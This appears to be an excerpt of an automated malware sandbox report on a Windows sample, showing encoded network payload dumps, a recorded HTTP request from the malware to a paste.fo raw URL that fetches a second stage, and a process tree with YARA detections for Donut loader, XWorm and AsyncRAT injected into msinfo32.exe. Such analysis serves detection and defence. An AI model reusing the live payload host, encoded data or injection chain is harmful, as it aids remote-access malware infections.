              Data Ascii: pSS+Kd3mWzovALG/VfCo1FDFnlJBbo/yVeBXo7sMQRUo4OCa/DWgXXsbZJlbUXPKn+Tdy4GtDnWB/xXWz1/90aKurgq2QjrPjlmWqR/z0gNYhHPVyFSZtM9/XjLRyU3VAGSrpoB0JLH07Je9bSaEoax9UoSksCDQXVT6twYmgK92cGNBTAGBKDahCEMyb9t+G1AkQ9HvdG1xHabIctDYAspRZQ5XI3MXd2pGZhL0P7KxZ/vZs6ZAttouYpt//+/
              2024-08-08 00:36:16 UTC1369INData Raw: 73 42 66 45 50 30 65 44 67 2b 6f 38 6f 7a 56 58 6b 58 6e 74 65 4e 73 34 32 52 47 37 53 48 2b 59 53 69 74 4e 47 78 39 4d 32 50 4f 52 35 4c 49 44 59 6f 43 32 39 63 4c 64 43 62 63 52 53 4c 75 70 4d 50 34 58 51 41 53 33 67 35 45 2b 59 6b 7a 63 56 6f 67 49 76 4e 4e 34 73 4b 49 7a 44 48 77 55 66 44 53 32 75 51 61 2b 35 58 6c 51 4e 38 45 36 51 65 4b 63 32 4b 67 72 77 66 58 58 53 73 37 45 34 6a 71 38 7a 33 70 35 73 33 54 43 54 46 4e 66 30 54 79 6b 67 4c 56 42 59 30 33 77 31 54 55 48 31 6d 32 56 55 57 66 62 35 35 63 34 59 2f 76 37 61 48 71 77 52 57 6d 50 77 54 6e 50 78 72 57 37 64 78 6b 38 65 45 6f 77 41 36 33 38 52 6a 53 69 51 2b 4b 46 58 62 2f 68 6d 35 48 56 69 47 43 70 69 6f 41 4e 43 41 64 64 34 4f 63 55 65 64 62 66 37 41 44 66 78 69 74 66 6b 75 47 75 42 4f 6b
              Data Ascii: sBfEP0eDg+o8ozVXkXnteNs42RG7SH+YSitNGx9M2POR5LIDYoC29cLdCbcRSLupMP4XQAS3g5E+YkzcVogIvNN4sKIzDHwUfDS2uQa+5XlQN8E6QeKc2KgrwfXXSs7E4jq8z3p5s3TCTFNf0TykgLVBY03w1TUH1m2VUWfb55c4Y/v7aHqwRWmPwTnPxrW7dxk8eEowA638RjSiQ+KFXb/hm5HViGCpioANCAdd4OcUedbf7ADfxitfkuGuBOk
              2024-08-08 00:36:16 UTC1369INData Raw: 37 47 36 43 6b 51 39 42 42 4f 74 6d 58 44 6b 54 70 56 36 4e 74 78 35 7a 46 79 6d 4a 67 6b 63 68 6c 46 53 56 37 30 7a 4f 52 6e 4a 75 6c 61 6e 7a 32 73 76 63 36 62 4d 4c 62 58 59 46 32 2b 6d 37 76 48 6e 44 38 75 42 50 78 63 5a 39 62 39 35 6d 78 58 6a 62 32 75 71 70 74 59 34 31 72 69 61 38 75 6f 38 69 47 6e 4b 73 30 67 34 75 4b 45 69 2b 55 57 75 41 65 4b 74 7a 44 59 70 54 57 49 38 56 6d 2f 51 74 58 58 51 73 55 51 78 48 51 68 33 55 44 4a 46 39 47 72 2f 72 57 47 34 5a 64 33 74 2f 39 58 74 32 49 4c 4f 51 36 56 4f 47 4e 45 61 58 62 38 68 5a 4e 7a 6e 50 42 4f 4a 6a 35 52 38 35 4b 45 2b 4b 34 33 35 62 49 71 2f 6e 45 6b 42 46 49 43 4a 74 36 48 4e 4e 70 4c 76 33 2b 6a 52 71 43 46 70 74 4c 6c 2b 44 32 6b 2f 65 2b 6e 39 49 6c 2b 4c 64 52 64 73 6b 4e 63 58 42 66 36 73
              Data Ascii: 7G6CkQ9BBOtmXDkTpV6Ntx5zFymJgkchlFSV70zORnJulanz2svc6bMLbXYF2+m7vHnD8uBPxcZ9b95mxXjb2uqptY41ria8uo8iGnKs0g4uKEi+UWuAeKtzDYpTWI8Vm/QtXXQsUQxHQh3UDJF9Gr/rWG4Zd3t/9Xt2ILOQ6VOGNEaXb8hZNznPBOJj5R85KE+K435bIq/nEkBFICJt6HNNpLv3+jRqCFptLl+D2k/e+n9Il+LdRdskNcXBf6s


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.449739104.21.28.764432284C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe
              TimestampBytes transferredDirectionData
              2024-08-08 00:36:23 UTC73OUTGET /raw/9c15a0ff5499 HTTP/1.1
              User-Agent: WebReader
              Host: paste.fo
              2024-08-08 00:36:24 UTC836INHTTP/1.1 200 OK
              Date: Thu, 08 Aug 2024 00:36:24 GMT
              Content-Type: text/plain;charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=r2ugjvevs2bb1sv04275mfn7cn; path=/
              Set-Cookie: token=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              Vary: Accept-Encoding
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q3zVbxOwTcndrGzQRhTTSElw8SiMqxpx8UvC9Zf6BmjWipRqxv0oksF1dYszKIamUFhJ67KVrr0yS5Ogj%2BnRgfwNd%2FTeaY4T%2BB7OlaTuhKynlvXbf7Cnkzp5Jg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8afb6e921bd31a38-EWR
              alt-svc: h3=":443"; ma=86400
              2024-08-08 00:36:24 UTC533INData Raw: 63 31 38 0d 0a 68 51 52 54 45 6f 7a 32 74 6a 51 4d 57 7a 67 2f 6b 6a 52 5a 58 4e 67 37 59 42 77 66 69 38 2f 46 54 62 4f 62 76 55 2f 61 31 59 35 2b 30 42 2b 34 74 48 54 65 43 58 39 62 6d 34 71 50 4c 44 68 7a 63 53 56 47 32 65 54 71 53 74 36 59 56 78 75 6f 6c 35 2b 6b 4b 38 39 44 44 66 62 62 53 50 35 61 6b 77 47 6e 50 68 5a 65 45 51 7a 50 37 73 78 59 47 4c 56 52 2b 76 59 7a 31 4e 67 44 68 58 55 45 6d 58 6f 59 33 63 6b 6f 39 33 6c 6f 6b 42 64 46 67 35 53 55 41 73 39 53 59 6b 79 52 34 38 4a 2b 73 4c 59 6f 34 30 73 4a 65 5a 45 45 6a 68 4a 78 47 66 43 47 43 41 65 62 72 72 73 49 30 76 32 75 4e 2f 6a 4f 4a 72 67 46 68 56 77 34 4b 46 73 59 6c 5a 69 35 74 76 65 72 53 73 67 54 6a 31 51 34 44 6b 78 52 63 43 2f 5a 65 74 30 69 46 76 4f 57 58 34 68 52 4f 65 65 6a 42 45
              Data Ascii: c18hQRTEoz2tjQMWzg/kjRZXNg7YBwfi8/FTbObvU/a1Y5+0B+4tHTeCX9bm4qPLDhzcSVG2eTqSt6YVxuol5+kK89DDfbbSP5akwGnPhZeEQzP7sxYGLVR+vYz1NgDhXUEmXoY3cko93lokBdFg5SUAs9SYkyR48J+sLYo40sJeZEEjhJxGfCGCAebrrsI0v2uN/jOJrgFhVw4KFsYlZi5tverSsgTj1Q4DkxRcC/Zet0iFvOWX4hROeejBE
              2024-08-08 00:36:24 UTC1369INData Raw: 62 53 63 72 30 5a 4f 65 78 4a 44 2b 35 75 71 57 73 52 67 38 65 4e 30 72 47 51 61 61 78 47 70 4a 2b 51 37 30 59 74 71 79 52 51 43 46 56 58 4b 77 6d 39 63 44 59 47 35 39 61 6a 69 79 6a 4e 78 54 50 6f 6a 45 32 34 39 48 65 55 59 6a 65 31 52 31 53 72 74 73 55 53 78 32 63 66 32 65 2f 38 78 30 46 33 74 6a 6e 37 36 6b 76 4a 54 70 32 43 58 4f 57 69 30 75 57 4c 4b 53 2b 32 44 67 44 4b 43 50 47 48 41 4b 54 71 59 6b 62 58 33 58 77 38 36 33 72 53 6c 6d 68 57 73 63 64 71 4e 5a 35 76 5a 31 2f 71 6a 7a 37 67 32 65 71 6e 59 5a 70 41 46 6c 6e 42 78 50 43 31 6e 6f 31 42 43 4c 65 71 63 59 78 54 56 53 76 76 55 32 57 6b 78 30 42 6b 6f 4f 5a 43 59 7a 47 65 6f 6d 66 5a 6e 7a 7a 31 4a 6d 43 72 58 6e 57 62 57 4f 34 4e 31 65 38 63 5a 73 52 42 4a 41 53 38 56 79 4e 6a 77 33 2f 59 4d
              Data Ascii: bScr0ZOexJD+5uqWsRg8eN0rGQaaxGpJ+Q70YtqyRQCFVXKwm9cDYG59ajiyjNxTPojE249HeUYje1R1SrtsUSx2cf2e/8x0F3tjn76kvJTp2CXOWi0uWLKS+2DgDKCPGHAKTqYkbX3Xw863rSlmhWscdqNZ5vZ1/qjz7g2eqnYZpAFlnBxPC1no1BCLeqcYxTVSvvU2Wkx0BkoOZCYzGeomfZnzz1JmCrXnWbWO4N1e8cZsRBJAS8VyNjw3/YM
              2024-08-08 00:36:24 UTC1201INData Raw: 31 6f 35 4a 2f 49 62 2b 56 49 6a 61 2b 71 53 4f 67 4c 6c 61 33 75 37 65 32 48 46 49 50 7a 77 32 4e 7a 36 4d 46 47 5a 6c 58 4e 77 52 61 6c 52 48 6b 6a 45 77 6e 2f 47 37 6b 77 45 75 4f 6a 4c 58 76 32 2f 34 47 4a 79 38 31 30 5a 53 51 70 4d 44 76 47 7a 2f 4a 52 45 47 72 77 58 33 4f 66 38 5a 59 6f 6d 73 42 2f 71 32 4a 68 4f 34 4b 37 34 58 61 45 30 57 30 4b 4c 35 61 6a 5a 67 35 66 64 55 49 6c 71 6a 4f 64 67 30 6c 6e 30 31 4d 35 53 5a 6b 49 38 61 5a 54 73 71 74 79 30 2f 38 4a 46 67 49 31 36 38 73 47 55 53 53 6e 4b 4a 37 47 38 51 64 71 31 67 43 6f 67 36 63 69 69 4d 62 74 2f 36 37 6d 52 30 37 7a 65 34 57 6a 71 50 42 38 45 69 38 37 73 45 35 58 49 46 67 79 49 68 57 76 71 56 67 4e 56 74 2f 37 4d 53 57 6c 4b 41 4b 6e 46 69 66 59 50 4a 4a 6a 73 6a 63 45 72 46 59 5a 51
              Data Ascii: 1o5J/Ib+VIja+qSOgLla3u7e2HFIPzw2Nz6MFGZlXNwRalRHkjEwn/G7kwEuOjLXv2/4GJy810ZSQpMDvGz/JREGrwX3Of8ZYomsB/q2JhO4K74XaE0W0KL5ajZg5fdUIlqjOdg0ln01M5SZkI8aZTsqty0/8JFgI168sGUSSnKJ7G8Qdq1gCog6ciiMbt/67mR07ze4WjqPB8Ei87sE5XIFgyIhWvqVgNVt/7MSWlKAKnFifYPJJjsjcErFYZQ
              2024-08-08 00:36:24 UTC1369INData Raw: 33 62 65 35 0d 0a 57 49 55 7a 58 6b 75 66 43 4a 76 2b 71 58 44 56 52 33 6f 76 58 77 35 78 6d 66 55 56 79 79 62 69 63 78 48 6d 39 63 48 41 42 46 2f 58 64 2b 76 4e 79 66 77 42 57 57 59 4f 47 4b 38 57 70 58 31 62 6b 43 76 38 62 5a 6f 61 50 47 77 4f 34 47 46 7a 75 64 53 52 63 61 32 34 7a 6a 61 4b 56 2b 34 37 50 52 6d 6e 38 4e 49 36 39 51 59 46 4e 48 6d 5a 33 70 6f 65 62 72 4c 51 67 67 43 75 79 58 66 32 32 67 56 77 77 4a 77 39 72 2f 2b 73 71 68 5a 79 4c 6b 44 46 56 75 68 58 37 67 67 61 32 75 41 76 6e 73 72 37 6d 6e 58 4b 6a 6b 39 38 4a 79 65 69 71 6c 33 31 4e 37 32 4e 64 34 38 65 61 41 4b 62 44 2b 5a 53 4a 30 4f 57 6a 61 63 75 63 65 34 65 39 4e 64 41 66 52 51 70 47 30 69 33 55 78 71 4e 37 57 74 45 30 56 34 5a 50 73 38 43 53 36 68 2b 2b 44 35 6e 6c 61 73 4e 79
              Data Ascii: 3be5WIUzXkufCJv+qXDVR3ovXw5xmfUVyybicxHm9cHABF/Xd+vNyfwBWWYOGK8WpX1bkCv8bZoaPGwO4GFzudSRca24zjaKV+47PRmn8NI69QYFNHmZ3poebrLQggCuyXf22gVwwJw9r/+sqhZyLkDFVuhX7gga2uAvnsr7mnXKjk98Jyeiql31N72Nd48eaAKbD+ZSJ0OWjacuce4e9NdAfRQpG0i3UxqN7WtE0V4ZPs8CS6h++D5nlasNy
              2024-08-08 00:36:24 UTC1369INData Raw: 73 74 34 36 6c 4a 33 43 34 6e 4b 73 71 43 51 63 53 63 73 6e 31 66 48 76 6c 57 6e 67 37 66 6e 67 38 59 4b 6a 4a 31 6b 30 36 6e 6e 73 36 6d 47 33 4f 42 32 30 7a 74 67 4f 79 72 30 65 70 6b 54 42 66 77 52 31 6f 31 52 74 4e 45 31 68 6b 71 6e 43 7a 75 73 56 66 37 76 6a 58 69 79 35 39 2b 76 4c 58 78 38 56 69 35 38 76 58 4f 4d 63 48 63 30 4e 70 62 57 70 39 4e 76 7a 2b 66 50 63 54 62 2b 52 53 35 35 53 37 32 50 4f 54 54 44 65 72 6e 78 72 36 49 39 69 43 6a 77 41 7a 6a 73 6d 6e 68 79 2f 31 33 75 63 74 73 53 5a 56 79 56 7a 6a 44 52 4c 4e 7a 65 49 5a 6b 38 63 4e 74 55 78 72 45 62 39 6f 32 42 63 73 41 36 50 51 54 58 6e 59 7a 57 79 6a 6d 58 51 76 49 38 58 62 6a 30 42 51 62 4b 66 62 48 5a 74 65 32 36 44 56 47 31 5a 51 67 4c 43 59 66 61 63 4d 2f 31 34 38 79 6e 59 57 65 4b
              Data Ascii: st46lJ3C4nKsqCQcScsn1fHvlWng7fng8YKjJ1k06nns6mG3OB20ztgOyr0epkTBfwR1o1RtNE1hkqnCzusVf7vjXiy59+vLXx8Vi58vXOMcHc0NpbWp9Nvz+fPcTb+RS55S72POTTDernxr6I9iCjwAzjsmnhy/13uctsSZVyVzjDRLNzeIZk8cNtUxrEb9o2BcsA6PQTXnYzWyjmXQvI8Xbj0BQbKfbHZte26DVG1ZQgLCYfacM/148ynYWeK
              2024-08-08 00:36:24 UTC1369INData Raw: 2f 4f 49 4e 35 33 4f 59 58 47 31 62 37 66 66 78 53 4b 64 79 47 6c 57 75 2f 6e 58 52 72 5a 46 6d 62 61 5a 62 6c 31 33 4e 76 52 44 59 31 57 6d 45 66 4a 70 66 36 66 34 4c 65 71 34 45 56 58 76 63 63 74 47 44 7a 55 43 30 79 38 69 76 38 4f 76 75 31 79 47 69 4f 30 69 31 47 66 46 53 61 6a 2b 45 41 68 54 7a 56 6b 52 2b 44 34 70 41 53 4b 62 73 6c 31 4e 6c 72 30 75 33 49 67 66 75 61 66 47 74 78 70 73 79 61 51 41 45 69 6b 66 43 67 35 63 35 79 42 37 78 61 38 59 34 7a 69 74 56 6b 77 2b 6c 35 61 6a 33 62 53 4b 34 73 30 66 36 33 32 47 51 4b 6b 34 4b 48 62 68 70 50 4b 6c 37 35 79 77 55 45 4a 78 6f 4b 43 64 35 43 42 74 65 66 35 5a 6c 5a 56 46 63 42 31 62 68 4d 76 58 39 62 47 37 6d 49 47 42 47 4e 36 2b 44 39 34 75 67 72 64 6b 53 32 52 69 4f 31 64 69 4a 37 2b 47 72 70 71 41
              Data Ascii: /OIN53OYXG1b7ffxSKdyGlWu/nXRrZFmbaZbl13NvRDY1WmEfJpf6f4Leq4EVXvcctGDzUC0y8iv8Ovu1yGiO0i1GfFSaj+EAhTzVkR+D4pASKbsl1Nlr0u3IgfuafGtxpsyaQAEikfCg5c5yB7xa8Y4zitVkw+l5aj3bSK4s0f632GQKk4KHbhpPKl75ywUEJxoKCd5CBtef5ZlZVFcB1bhMvX9bG7mIGBGN6+D94ugrdkS2RiO1diJ7+GrpqA
              2024-08-08 00:36:24 UTC1369INData Raw: 4a 4d 73 36 78 6d 46 75 5a 47 67 73 37 6e 79 50 7a 33 79 5a 36 6d 76 33 47 6e 37 43 32 4d 44 38 42 42 44 49 63 72 38 78 58 6d 7a 69 5a 42 6c 30 48 7a 6d 2b 32 61 32 44 4c 42 48 31 41 38 58 36 4a 72 5a 55 68 42 76 37 68 4a 73 66 64 69 49 4f 57 33 56 36 41 4c 4c 30 71 6d 30 71 4e 6a 4a 2b 30 4a 41 5a 72 48 54 50 42 2b 6d 71 6e 74 50 6d 59 4a 5a 65 76 63 42 79 77 69 6f 51 77 31 38 52 35 39 61 69 57 44 44 4d 69 6b 39 53 72 38 53 74 79 77 56 6f 45 75 46 76 44 6d 67 73 34 6b 37 42 70 68 61 79 33 54 68 6b 30 32 59 73 32 42 75 74 76 6f 48 45 76 5a 33 51 64 72 53 42 64 68 7a 2f 63 32 33 52 34 37 2f 44 6f 56 55 67 71 4b 4e 4e 50 4f 4d 74 64 62 75 2b 6a 59 43 67 52 30 52 6d 6e 56 48 4a 53 49 61 34 68 2b 70 53 4e 50 50 43 72 73 79 35 66 6b 43 7a 61 39 61 35 30 4e 30
              Data Ascii: JMs6xmFuZGgs7nyPz3yZ6mv3Gn7C2MD8BBDIcr8xXmziZBl0Hzm+2a2DLBH1A8X6JrZUhBv7hJsfdiIOW3V6ALL0qm0qNjJ+0JAZrHTPB+mqntPmYJZevcBywioQw18R59aiWDDMik9Sr8StywVoEuFvDmgs4k7Bphay3Thk02Ys2ButvoHEvZ3QdrSBdhz/c23R47/DoVUgqKNNPOMtdbu+jYCgR0RmnVHJSIa4h+pSNPPCrsy5fkCza9a50N0
              2024-08-08 00:36:24 UTC1369INData Raw: 35 43 47 69 6f 6e 48 48 4d 39 78 31 79 67 70 72 6f 57 2b 55 71 65 34 46 59 69 77 66 39 49 45 4c 73 30 6b 4a 75 63 33 4e 6e 73 32 42 57 6b 44 76 55 64 68 75 68 4e 61 64 76 6f 44 68 52 42 33 5a 50 7a 63 4c 49 58 61 37 59 77 67 6f 57 47 39 65 76 74 49 38 61 6f 39 6a 52 2f 4d 76 56 47 42 76 44 51 2b 64 32 30 6c 53 36 39 70 55 75 69 64 66 68 6c 7a 2f 32 67 46 47 43 50 30 43 56 73 58 42 77 64 30 51 36 30 43 37 39 52 4c 53 33 4c 68 4e 72 6d 66 79 2f 58 47 35 75 77 4d 6e 77 6f 32 32 74 6d 56 75 63 71 54 68 37 4b 42 4c 51 70 53 53 2b 4b 64 33 6d 57 7a 6f 76 41 4c 47 2f 56 66 43 6f 31 46 44 46 6e 6c 4a 42 62 6f 2f 79 56 65 42 58 6f 37 73 4d 51 52 55 6f 34 4f 43 61 2f 44 57 67 58 58 73 62 5a 4a 6c 62 55 58 50 4b 6e 2b 54 64 79 34 47 74 44 6e 57 42 2f 78 58 57 7a 31
              Data Ascii: 5CGionHHM9x1ygproW+Uqe4FYiwf9IELs0kJuc3Nns2BWkDvUdhuhNadvoDhRB3ZPzcLIXa7YwgoWG9evtI8ao9jR/MvVGBvDQ+d20lS69pUuidfhlz/2gFGCP0CVsXBwd0Q60C79RLS3LhNrmfy/XG5uwMnwo22tmVucqTh7KBLQpSS+Kd3mWzovALG/VfCo1FDFnlJBbo/yVeBXo7sMQRUo4OCa/DWgXXsbZJlbUXPKn+Tdy4GtDnWB/xXWz1
              2024-08-08 00:36:24 UTC1369INData Raw: 30 58 56 4c 38 62 47 67 2b 7a 6e 34 62 31 55 30 34 71 30 76 73 57 6e 55 4e 46 58 53 69 77 41 57 6f 6b 61 55 2f 50 30 6b 43 6a 48 65 69 74 4b 6a 77 62 58 58 47 67 4b 4d 6e 73 4d 78 62 6f 73 35 64 4e 57 63 7a 6c 2b 55 45 6e 33 4e 6b 6e 69 79 4f 47 63 56 6a 37 79 6e 2f 79 4a 66 56 69 55 53 6c 37 59 50 61 6a 44 6f 5a 6d 70 79 51 58 63 61 47 74 71 63 61 52 2f 6d 45 58 39 4c 69 30 4d 64 75 37 41 33 2f 50 4b 69 68 6b 32 51 73 62 50 73 59 42 4e 31 48 6a 54 6e 64 63 69 68 74 45 50 50 68 58 41 53 55 39 72 30 42 79 34 38 4c 73 42 66 45 50 30 65 44 67 2b 6f 38 6f 7a 56 58 6b 58 6e 74 65 4e 73 34 32 52 47 37 53 48 2b 59 53 69 74 4e 47 78 39 4d 32 50 4f 52 35 4c 49 44 59 6f 43 32 39 63 4c 64 43 62 63 52 53 4c 75 70 4d 50 34 58 51 41 53 33 67 35 45 2b 59 6b 7a 63 56 6f
              Data Ascii: 0XVL8bGg+zn4b1U04q0vsWnUNFXSiwAWokaU/P0kCjHeitKjwbXXGgKMnsMxbos5dNWczl+UEn3NkniyOGcVj7yn/yJfViUSl7YPajDoZmpyQXcaGtqcaR/mEX9Li0Mdu7A3/PKihk2QsbPsYBN1HjTndcihtEPPhXASU9r0By48LsBfEP0eDg+o8ozVXkXnteNs42RG7SH+YSitNGx9M2POR5LIDYoC29cLdCbcRSLupMP4XQAS3g5E+YkzcVo
              2024-08-08 00:36:24 UTC1369INData Raw: 52 68 43 6a 53 51 77 68 37 6d 69 79 6c 36 4f 7a 51 6a 6f 50 6f 68 6b 6e 6a 35 38 44 30 59 32 74 6a 74 6d 33 49 5a 47 7a 4a 54 5a 73 62 52 76 76 75 42 43 61 6b 6a 53 34 45 33 6b 35 6e 41 45 71 47 7a 33 31 76 4c 5a 4b 4a 73 70 4d 32 58 56 6b 47 6d 43 67 54 55 32 4b 38 6c 5a 77 2f 61 37 7a 69 55 49 65 37 52 6f 61 63 66 6c 45 64 79 78 54 46 49 4f 30 62 43 48 65 41 74 2f 7a 74 73 4b 6f 6e 79 37 4f 61 4a 33 4a 4e 47 70 46 61 32 4d 35 52 71 47 54 43 63 5a 64 6f 2f 79 66 71 47 46 53 32 4c 33 4f 49 46 52 52 2b 54 61 54 45 37 47 36 43 6b 51 39 42 42 4f 74 6d 58 44 6b 54 70 56 36 4e 74 78 35 7a 46 79 6d 4a 67 6b 63 68 6c 46 53 56 37 30 7a 4f 52 6e 4a 75 6c 61 6e 7a 32 73 76 63 36 62 4d 4c 62 58 59 46 32 2b 6d 37 76 48 6e 44 38 75 42 50 78 63 5a 39 62 39 35 6d 78 58
              Data Ascii: RhCjSQwh7miyl6OzQjoPohknj58D0Y2tjtm3IZGzJTZsbRvvuBCakjS4E3k5nAEqGz31vLZKJspM2XVkGmCgTU2K8lZw/a7ziUIe7RoacflEdyxTFIO0bCHeAt/ztsKony7OaJ3JNGpFa2M5RqGTCcZdo/yfqGFS2L3OIFRR+TaTE7G6CkQ9BBOtmXDkTpV6Ntx5zFymJgkchlFSV70zORnJulanz2svc6bMLbXYF2+m7vHnD8uBPxcZ9b95mxX


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Click to jump to process

              Target ID:0
              Start time:20:35:59
              Start date:07/08/2024
              Path:C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe
              Wow64 process (32bit):false
              Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe"
              Imagebase:0x290000
              File size:354'816 bytes
              MD5 hash:FF0BADEB5D6675C36D8F9068A1232258
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000003.1720661736.0000025E727F5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000003.1717644946.0000025E727D0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              Reputation:low
              Has exited:true

              Target ID:1
              Start time:20:35:59
              Start date:07/08/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7699e0000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:2
              Start time:20:35:59
              Start date:07/08/2024
              Path:C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe"
              Imagebase:0x7ff64f7a0000
              File size:385'024 bytes
              MD5 hash:0AED91DA63713BF9F881B03A604A1C9D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000002.00000002.4156638612.000001AA11010000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.4156799723.000001AA12890000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000002.4156799723.000001AA12890000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
              Reputation:low
              Has exited:false

              Target ID:3
              Start time:20:36:14
              Start date:07/08/2024
              Path:C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe
              Wow64 process (32bit):false
              Commandline:"C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe"
              Imagebase:0xb60000
              File size:354'816 bytes
              MD5 hash:FF0BADEB5D6675C36D8F9068A1232258
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000003.00000003.1863566508.000002806C4D0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000003.00000003.1863731126.000002806C4F5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              Antivirus matches:
              • Detection: 25%, Virustotal, Browse
              Reputation:low
              Has exited:true

              Target ID:4
              Start time:20:36:14
              Start date:07/08/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7699e0000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:5
              Start time:20:36:14
              Start date:07/08/2024
              Path:C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe"
              Imagebase:0x7ff64f7a0000
              File size:385'024 bytes
              MD5 hash:0AED91DA63713BF9F881B03A604A1C9D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000005.00000002.1897543968.00000204FD660000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000002.1897725884.00000204FD720000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000005.00000002.1897725884.00000204FD720000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000002.1896700546.0000020480001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000005.00000002.1896700546.0000020480001000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:low
              Has exited:true

              Target ID:9
              Start time:20:36:22
              Start date:07/08/2024
              Path:C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe
              Wow64 process (32bit):false
              Commandline:"C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe"
              Imagebase:0xb60000
              File size:354'816 bytes
              MD5 hash:FF0BADEB5D6675C36D8F9068A1232258
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000009.00000003.1943122985.00000282C50AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000009.00000003.1943224390.00000282C6D25000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000009.00000003.1943070023.00000282C6D10000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              Reputation:low
              Has exited:true

              Target ID:10
              Start time:20:36:22
              Start date:07/08/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7699e0000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:11
              Start time:20:36:22
              Start date:07/08/2024
              Path:C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe"
              Imagebase:0x7ff64f7a0000
              File size:385'024 bytes
              MD5 hash:0AED91DA63713BF9F881B03A604A1C9D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.1976262296.0000027ADEE40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000002.1976262296.0000027ADEE40000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
